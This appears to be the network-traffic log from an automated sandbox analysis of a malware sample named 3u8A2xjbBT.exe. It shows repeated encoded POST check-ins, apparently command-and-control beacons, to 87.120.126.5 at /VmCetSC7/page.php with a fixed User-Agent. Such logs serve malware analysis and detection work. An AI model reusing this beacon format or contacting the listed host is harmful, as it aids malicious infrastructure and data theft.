                                    Oct 30, 2024 12:24:09.706768990 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:10.187701941 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:10.200161934 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    6192.168.2.74998187.120.126.5802908C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:24:14.760262966 CET194OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Oct 30, 2024 12:24:15.115757942 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:15.583427906 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:15.599507093 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:15 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    7192.168.2.74998287.120.126.5804704C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:24:17.121619940 CET194OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Oct 30, 2024 12:24:17.472443104 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:17.936234951 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:17.950364113 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:17 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    8192.168.2.74998387.120.126.5806464C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:24:20.213377953 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:20.567019939 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:21.023513079 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:21.045025110 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    9192.168.2.74998487.120.126.5804704C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:24:25.494616985 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:25.847443104 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:26.306341887 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:26.317204952 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:26 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    10192.168.2.74998587.120.126.5806464C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:24:28.970891953 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:29.322052002 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:29.787497044 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:29.796834946 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:29 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    11192.168.2.74998687.120.126.5804704C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:24:41.322659016 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:41.675647974 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:42.128978014 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:42.146981955 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:42 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    12192.168.2.74998787.120.126.5806464C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:24:56.058618069 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:56.410070896 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:57.055794954 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:57.055819035 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0
                                    Oct 30, 2024 12:24:57.056241989 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:56 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    13192.168.2.74998887.120.126.5804704C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:24:57.355227947 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:24:57.707786083 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:24:58.211189985 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:24:58.222182989 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:24:58 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    14192.168.2.74998987.120.126.5806464C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:25:09.764139891 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:10.113370895 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:10.590372086 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:10.614449978 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    15192.168.2.74999087.120.126.5804704C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:25:10.104289055 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:10.457149982 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:10.952028990 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:10.961870909 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:10 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    16192.168.2.74999187.120.126.5804704C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:25:17.260421991 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:17.613322020 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:18.083045959 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:18.093244076 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:17 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    17192.168.2.74999287.120.126.5806464C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:25:19.495362997 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:19.847637892 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:20.318298101 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:20.331440926 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:20 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    18192.168.2.74999387.120.126.5804704C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:25:33.176342964 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:33.535197973 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:33.999937057 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:34.013309956 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:33 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    19192.168.2.74999487.120.126.5806464C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:25:36.682791948 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:37.035238028 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=1KOnabZQRXT0NvIAsOUE/xkQBei0WVrvEyYSrzN8nuI=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:37.531061888 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:37.546988964 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:37 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    20192.168.2.74999587.120.126.5802908C:\Users\user\Desktop\3u8A2xjbBT.exe
                                    TimestampBytes transferredDirectionData
                                    Oct 30, 2024 12:25:48.968986034 CET218OUTPOST /VmCetSC7/page.php HTTP/1.1
                                    User-Agent: E9BC3BD76216AFA560BFB5ACAF5731A3
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: 87.120.126.5
                                    Content-Length: 471
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    Oct 30, 2024 12:25:49.316513062 CET471OUTData Raw: 69 64 3d 48 30 2f 75 7e 50 71 51 61 36 51 48 77 71 69 58 4d 71 64 59 6a 55 36 48 55 62 46 79 4b 58 53 6a 47 44 4f 62 48 73 45 52 67 39 76 54 49 4e 5a 33 79 43 55 6b 49 76 72 32 4f 49 78 6d 6b 70 73 62 73 6e 4c 6b 4b 51 4f 48 58 39 7e 37 54 39 51
                                    Data Ascii: id=H0/u~PqQa6QHwqiXMqdYjU6HUbFyKXSjGDObHsERg9vTINZ3yCUkIvr2OIxmkpsbsnLkKQOHX9~7T9QoVVHFFw==&os=b1~Ya6floynEjDOLJ6CTODXfxVYKZF2MUTe17DY4MXs=&pv=N1KssbFnXifLaSKNWKTH5P8C9zq64/P7HwIx8eom7Sk=&ip=hfs6J/pDbIS~Slpd4epYRoUQRaerWSHx6dZxfqc7YA7a34hhY4Mw
                                    Oct 30, 2024 12:25:49.817302942 CET25INHTTP/1.1 100 Continue
                                    Oct 30, 2024 12:25:49.828653097 CET175INHTTP/1.1 200 OK
                                    Server: nginx/1.22.1
                                    Date: Wed, 30 Oct 2024 11:25:49 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: keep-alive
                                    Data Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


